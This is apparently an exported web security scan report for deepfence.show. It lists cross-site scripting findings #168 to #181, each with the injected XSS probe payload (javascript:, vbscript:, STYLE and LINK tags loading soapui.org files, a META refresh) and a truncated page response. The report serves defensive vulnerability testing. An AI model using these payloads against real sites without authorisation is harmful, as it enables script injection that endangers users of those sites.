href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #168\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <BR SIZE=\"&{alert('XSS')}\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #169\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <LAYER SRC=\"http://soapui.org/scriptlet.html\"></\nLAYER>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #170\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\n\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #171Scan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <LINK REL=\"stylesheet\" HREF=\"http://soapui.org/\nxss.css\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #172\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <STYLE>@import'http://soapui.org/xss.css';</STYLE>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #173\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <META HTTP-EQUIV=\"Link\" Content=\"<http://soapui.org/\nxss.css>; REL=stylesheet\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #174\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <STYLE>BODY{-moz-binding:url(\"http://soapui.org/\nxssmoz.xml#xss\")}</STYLE>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #175\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <XSS STYLE=\"behavior: url(xss.htc);\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #176\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</\nSTYLE><UL><LI>XSS\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #177\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <IMG SRC='vbscript:msgbox(\"XSS\")'>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #178\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <IMG SRC=\"mocha:[code]\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79Issue Number #179\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <IMG SRC=\"livescript:[code]\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #180\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io \u00ef\u00bf\u00bdscript\u00ef\u00bf\u00bdalert(\u00ef\u00bf\u00bdXSS\u00ef\u00bf\u00bd)\u00ef\u00bf\u00bd/script\u00ef\u00bf\u00bd\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #181\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=\njavascript:alert('XSS');\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 